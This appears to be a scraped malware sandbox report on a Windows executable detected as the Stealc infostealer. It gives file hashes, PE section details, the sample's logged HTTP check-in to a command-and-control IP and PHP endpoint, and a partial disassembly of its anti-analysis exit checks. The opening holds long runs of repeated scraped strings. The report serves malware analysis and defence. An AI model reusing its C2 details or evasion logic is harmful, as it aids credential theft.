eWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZseeIf3YM4Csy3PIV85PbXFYIuATiQmdLLycE9d8EeWpqjjQQnZsGet hashmaliciousMamba2FABrowse
                                      • 13.107.246.45
                                      https://docs.google.com/drawings/d/1agK-6fGF4y65hrPDNlHipoTNyumPU-yxdwKLkQWhsQI/preview?pli=1oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEbgh9nHpcsGxk5oPV9kwbB7UH4rAmZq9HDFgMGAo29Qgv7cs7YEGet hashmaliciousUnknownBrowse
                                      • 13.107.246.45

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousLummaC, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.37

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.947416099994073
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'834'496 bytes
                                      MD5:3833a1b7c23d66eecec6b16ddf5cf540
                                      SHA1:05182934e239a8e6715ada16e0ddcde3b7598e05
                                      SHA256:96f09e8bd3f67c287a0bb1529d5220d9496a233fba5b1608366a2c280a864dd2
                                      SHA512:3c824f5aa05ff6ba2a1f9d805d2d1f755f1a8a5646d367c325d0a7b6b38d0dfedd61e75f984fcc6686c27fd1a4c5147f874a9a468ef15aed589ed993d2033069
                                      SSDEEP:49152:8mRhmhK5ZSLue0v+HpxCBlwQhwegB589ooccs9GULcbHN1:JCKyvHpxC7BCLoULyt1
                                      TLSH:66853308BD684A6CC9AA8E7815AF8F8FE6651908DE3707932B3C2503353C27F9316D57
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0xa92000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F47DCEE0ECAh
                                      paddusb mm3, qword ptr [ebx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], cl
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [esi], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [edx], ah
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add cl, byte ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or byte ptr [eax+00000000h], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      inc eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x25b0000x22800d3b01b827379ee525cfe171886a96f3aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x25e0000x2990000x200a1f9d605966ea6fc9df20e5f122a3960unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      rhebxyzr0x4f70000x19a0000x199c00f34a1321ebe2a7919025483fd801ab60False0.9951511497101891data7.953785461765037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      gzayextq0x6910000x10000x400c58b1ce18291d655eb3a94c1e073947cFalse0.78515625data6.105330411148558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x6920000x30000x22003190f6cc3b2153cc5b0de2090890daccFalse0.06135110294117647DOS executable (COM)0.7026692356155418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-26T05:55:08.006858+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 26, 2024 05:55:06.800345898 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:06.805668116 CEST8049704185.215.113.206192.168.2.5
                                      Oct 26, 2024 05:55:06.805761099 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:06.813767910 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:06.819065094 CEST8049704185.215.113.206192.168.2.5
                                      Oct 26, 2024 05:55:07.717093945 CEST8049704185.215.113.206192.168.2.5
                                      Oct 26, 2024 05:55:07.717329025 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:07.720807076 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:07.726178885 CEST8049704185.215.113.206192.168.2.5
                                      Oct 26, 2024 05:55:08.006592989 CEST8049704185.215.113.206192.168.2.5
                                      Oct 26, 2024 05:55:08.006858110 CEST4970480192.168.2.5185.215.113.206
                                      Oct 26, 2024 05:55:11.563586950 CEST4970480192.168.2.5185.215.113.206

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 26, 2024 05:55:17.543045998 CEST1.1.1.1192.168.2.50x705No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                      Oct 26, 2024 05:55:17.543045998 CEST1.1.1.1192.168.2.50x705No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704185.215.113.206805752C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 26, 2024 05:55:06.813767910 CEST90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 26, 2024 05:55:07.717093945 CEST203INHTTP/1.1 200 OK
                                      Date: Sat, 26 Oct 2024 03:55:07 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 26, 2024 05:55:07.720807076 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJE
                                      Host: 185.215.113.206
                                      Content-Length: 210
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 41 35 43 35 37 43 45 37 41 38 39 35 31 34 37 30 31 38 32 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a
                                      Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"4A5C57CE7A89514701825------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"puma------GHDAAKJEGCFCAKEBKJJE--
                                      Oct 26, 2024 05:55:08.006592989 CEST210INHTTP/1.1 200 OK
                                      Date: Sat, 26 Oct 2024 03:55:07 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:23:55:04
                                      Start date:25/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0xa40000
                                      File size:1'834'496 bytes
                                      MD5 hash:3833A1B7C23D66EECEC6B16DDF5CF540
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137808772.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2096593419.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:7.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:24
                                        execution_graph 13481 a569f0 13526 a42260 13481->13526 13505 a56a64 13506 a5a9b0 4 API calls 13505->13506 13507 a56a6b 13506->13507 13508 a5a9b0 4 API calls 13507->13508 13509 a56a72 13508->13509 13510 a5a9b0 4 API calls 13509->13510 13511 a56a79 13510->13511 13512 a5a9b0 4 API calls 13511->13512 13513 a56a80 13512->13513 13678 a5a8a0 13513->13678 13515 a56b0c 13682 a56920 GetSystemTime 13515->13682 13516 a56a89 13516->13515 13518 a56ac2 OpenEventA 13516->13518 13520 a56af5 CloseHandle Sleep 13518->13520 13521 a56ad9 13518->13521 13523 a56b0a 13520->13523 13525 a56ae1 CreateEventA 13521->13525 13523->13516 13525->13515 13879 a445c0 13526->13879 13528 a42274 13529 a445c0 2 API calls 13528->13529 13530 a4228d 13529->13530 13531 a445c0 2 API calls 13530->13531 13532 a422a6 13531->13532 13533 a445c0 2 API calls 13532->13533 13534 a422bf 13533->13534 13535 a445c0 2 API calls 13534->13535 13536 a422d8 13535->13536 13537 a445c0 2 API calls 13536->13537 13538 a422f1 13537->13538 13539 a445c0 2 API calls 13538->13539 13540 a4230a 13539->13540 13541 a445c0 2 API calls 13540->13541 13542 a42323 13541->13542 13543 a445c0 2 API calls 13542->13543 13544 a4233c 13543->13544 13545 a445c0 2 API calls 13544->13545 13546 a42355 13545->13546 13547 a445c0 2 API calls 13546->13547 13548 a4236e 13547->13548 13549 a445c0 2 API calls 13548->13549 13550 a42387 13549->13550 13551 a445c0 2 API calls 13550->13551 13552 a423a0 13551->13552 13553 a445c0 2 API calls 13552->13553 13554 a423b9 13553->13554 13555 a445c0 2 API calls 13554->13555 13556 a423d2 13555->13556 13557 a445c0 2 API calls 13556->13557 13558 a423eb 13557->13558 13559 a445c0 2 API calls 13558->13559 13560 a42404 13559->13560 13561 a445c0 2 API calls 13560->13561 13562 a4241d 13561->13562 13563 a445c0 2 API calls 13562->13563 13564 a42436 13563->13564 13565 a445c0 2 API calls 13564->13565 13566 a4244f 13565->13566 13567 a445c0 2 API calls 13566->13567 13568 a42468 13567->13568 13569 a445c0 2 API calls 13568->13569 13570 a42481 13569->13570 13571 a445c0 2 API calls 13570->13571 13572 a4249a 13571->13572 13573 a445c0 2 API calls 13572->13573 13574 a424b3 13573->13574 13575 a445c0 2 API calls 13574->13575 13576 a424cc 13575->13576 13577 a445c0 2 API calls 13576->13577 13578 a424e5 13577->13578 13579 a445c0 2 API calls 13578->13579 13580 a424fe 13579->13580 13581 a445c0 2 API calls 13580->13581 13582 a42517 13581->13582 13583 a445c0 2 API calls 13582->13583 13584 a42530 13583->13584 13585 a445c0 2 API calls 13584->13585 13586 a42549 13585->13586 13587 a445c0 2 API calls 13586->13587 13588 a42562 13587->13588 13589 a445c0 2 API calls 13588->13589 13590 a4257b 13589->13590 13591 a445c0 2 API calls 13590->13591 13592 a42594 13591->13592 13593 a445c0 2 API calls 13592->13593 13594 a425ad 13593->13594 13595 a445c0 2 API calls 13594->13595 13596 a425c6 13595->13596 13597 a445c0 2 API calls 13596->13597 13598 a425df 13597->13598 13599 a445c0 2 API calls 13598->13599 13600 a425f8 13599->13600 13601 a445c0 2 API calls 13600->13601 13602 a42611 13601->13602 13603 a445c0 2 API calls 13602->13603 13604 a4262a 13603->13604 13605 a445c0 2 API calls 13604->13605 13606 a42643 13605->13606 13607 a445c0 2 API calls 13606->13607 13608 a4265c 13607->13608 13609 a445c0 2 API calls 13608->13609 13610 a42675 13609->13610 13611 a445c0 2 API calls 13610->13611 13612 a4268e 13611->13612 13613 a59860 13612->13613 13884 a59750 GetPEB 13613->13884 13615 a59868 13616 a59a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13615->13616 13617 a5987a 13615->13617 13618 a59af4 GetProcAddress 13616->13618 13619 a59b0d 13616->13619 13620 a5988c 21 API calls 13617->13620 13618->13619 13621 a59b46 13619->13621 13622 a59b16 GetProcAddress GetProcAddress 13619->13622 13620->13616 13623 a59b4f GetProcAddress 13621->13623 13624 a59b68 13621->13624 13622->13621 13623->13624 13625 a59b71 GetProcAddress 13624->13625 13626 a59b89 13624->13626 13625->13626 13627 a56a00 13626->13627 13628 a59b92 GetProcAddress GetProcAddress 13626->13628 13629 a5a740 13627->13629 13628->13627 13630 a5a750 13629->13630 13631 a56a0d 13630->13631 13632 a5a77e lstrcpy 13630->13632 13633 a411d0 13631->13633 13632->13631 13634 a411e8 13633->13634 13635 a41217 13634->13635 13636 a4120f ExitProcess 13634->13636 13637 a41160 GetSystemInfo 13635->13637 13638 a41184 13637->13638 13639 a4117c ExitProcess 13637->13639 13640 a41110 GetCurrentProcess VirtualAllocExNuma 13638->13640 13641 a41141 ExitProcess 13640->13641 13642 a41149 13640->13642 13885 a410a0 VirtualAlloc 13642->13885 13645 a41220 13889 a589b0 13645->13889 13648 a41249 __aulldiv 13649 a4129a 13648->13649 13650 a41292 ExitProcess 13648->13650 13651 a56770 GetUserDefaultLangID 13649->13651 13652 a567d3 13651->13652 13653 a56792 13651->13653 13659 a41190 13652->13659 13653->13652 13654 a567b7 ExitProcess 13653->13654 13655 a567c1 ExitProcess 13653->13655 13656 a567a3 ExitProcess 13653->13656 13657 a567ad ExitProcess 13653->13657 13658 a567cb ExitProcess 13653->13658 13658->13652 13660 a578e0 3 API calls 13659->13660 13661 a4119e 13660->13661 13662 a411cc 13661->13662 13663 a57850 3 API calls 13661->13663 13666 a57850 GetProcessHeap RtlAllocateHeap GetUserNameA 13662->13666 13664 a411b7 13663->13664 13664->13662 13665 a411c4 ExitProcess 13664->13665 13667 a56a30 13666->13667 13668 a578e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13667->13668 13669 a56a43 13668->13669 13670 a5a9b0 13669->13670 13891 a5a710 13670->13891 13672 a5a9c1 lstrlen 13673 a5a9e0 13672->13673 13674 a5aa18 13673->13674 13676 a5a9fa lstrcpy lstrcat 13673->13676 13892 a5a7a0 13674->13892 13676->13674 13677 a5aa24 13677->13505 13679 a5a8bb 13678->13679 13680 a5a90b 13679->13680 13681 a5a8f9 lstrcpy 13679->13681 13680->13516 13681->13680 13896 a56820 13682->13896 13684 a5698e 13685 a56998 sscanf 13684->13685 13925 a5a800 13685->13925 13687 a569aa SystemTimeToFileTime SystemTimeToFileTime 13688 a569e0 13687->13688 13689 a569ce 13687->13689 13691 a55b10 13688->13691 13689->13688 13690 a569d8 ExitProcess 13689->13690 13692 a55b1d 13691->13692 13693 a5a740 lstrcpy 13692->13693 13694 a55b2e 13693->13694 13927 a5a820 lstrlen 13694->13927 13697 a5a820 2 API calls 13698 a55b64 13697->13698 13699 a5a820 2 API calls 13698->13699 13700 a55b74 13699->13700 13931 a56430 13700->13931 13703 a5a820 2 API calls 13704 a55b93 13703->13704 13705 a5a820 2 API calls 13704->13705 13706 a55ba0 13705->13706 13707 a5a820 2 API calls 13706->13707 13708 a55bad 13707->13708 13709 a5a820 2 API calls 13708->13709 13710 a55bf9 13709->13710 13940 a426a0 13710->13940 13718 a55cc3 13719 a56430 lstrcpy 13718->13719 13720 a55cd5 13719->13720 13721 a5a7a0 lstrcpy 13720->13721 13722 a55cf2 13721->13722 13723 a5a9b0 4 API calls 13722->13723 13724 a55d0a 13723->13724 13725 a5a8a0 lstrcpy 13724->13725 13726 a55d16 13725->13726 13727 a5a9b0 4 API calls 13726->13727 13728 a55d3a 13727->13728 13729 a5a8a0 lstrcpy 13728->13729 13730 a55d46 13729->13730 13731 a5a9b0 4 API calls 13730->13731 13732 a55d6a 13731->13732 13733 a5a8a0 lstrcpy 13732->13733 13734 a55d76 13733->13734 13735 a5a740 lstrcpy 13734->13735 13736 a55d9e 13735->13736 14666 a57500 GetWindowsDirectoryA 13736->14666 13739 a5a7a0 lstrcpy 13740 a55db8 13739->13740 14676 a44880 13740->14676 13742 a55dbe 14821 a517a0 13742->14821 13744 a55dc6 13745 a5a740 lstrcpy 13744->13745 13746 a55de9 13745->13746 13747 a41590 lstrcpy 13746->13747 13748 a55dfd 13747->13748 14837 a45960 13748->14837 13750 a55e03 14981 a51050 13750->14981 13752 a55e0e 13753 a5a740 lstrcpy 13752->13753 13754 a55e32 13753->13754 13755 a41590 lstrcpy 13754->13755 13756 a55e46 13755->13756 13757 a45960 34 API calls 13756->13757 13758 a55e4c 13757->13758 14985 a50d90 13758->14985 13760 a55e57 13761 a5a740 lstrcpy 13760->13761 13762 a55e79 13761->13762 13763 a41590 lstrcpy 13762->13763 13764 a55e8d 13763->13764 13765 a45960 34 API calls 